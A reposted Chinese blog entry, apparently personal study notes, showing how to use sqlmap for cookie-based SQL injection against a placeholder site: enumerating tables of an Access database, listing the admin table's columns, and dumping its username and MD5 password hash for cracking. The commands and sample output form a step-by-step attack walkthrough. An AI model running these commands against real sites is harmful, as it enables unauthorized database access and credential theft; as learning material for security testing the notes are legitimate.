码迷,mamicode.com
首页 > 数据库 > 详细

3.sqlmap学习笔记之Cookie注入

时间:2014-11-22 22:45:35      阅读:243      评论:0      收藏:0      [点我收藏+]

标签:style   blog   http   ar   color   os   sp   数据   on   

Cookie注入:

1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.
2.sqlmap命令提示符下输入下列内容进行跑表。

  sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2

   假设返回内容如下,说明是access数据库。

   -------------------------
   
   [INFO] resuming back-end DBMS microsoft access

   -------------------------  

   设置线程数:10 
   假设返回结果:

-------------------------------------------
[ 4 tables]

+----------------------+

       admin
       mark
       province
       vote

+----------------------+

   找到四个表分别为:admin mark province vote

3.猜表的字段名:

  sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --columns -T admin --level 2

     假设找到admin表的字段如下:                   
                            id username password 

---------------------------------

  [INFO] retrieved:       id
  [INFO] retrieved:       username
  [INFO] retrieved:       password

----------------------------------  

4.猜测字段的内容:

    sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --dump -T admin -C "username,password" --level 2    

  获取结果:

  [INFO] retrieved:       1
  [INFO] retrieved:       admin
  [INFO] retrieved:       21232f297a57a5a743894a0e4a801fc3  (32位MD5加密密文)


  账号:admin 密码:将密文解密即可。

3.sqlmap学习笔记之Cookie注入

标签:style   blog   http   ar   color   os   sp   数据   on   

原文地址:http://www.cnblogs.com/xingyunblog/p/4115726.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!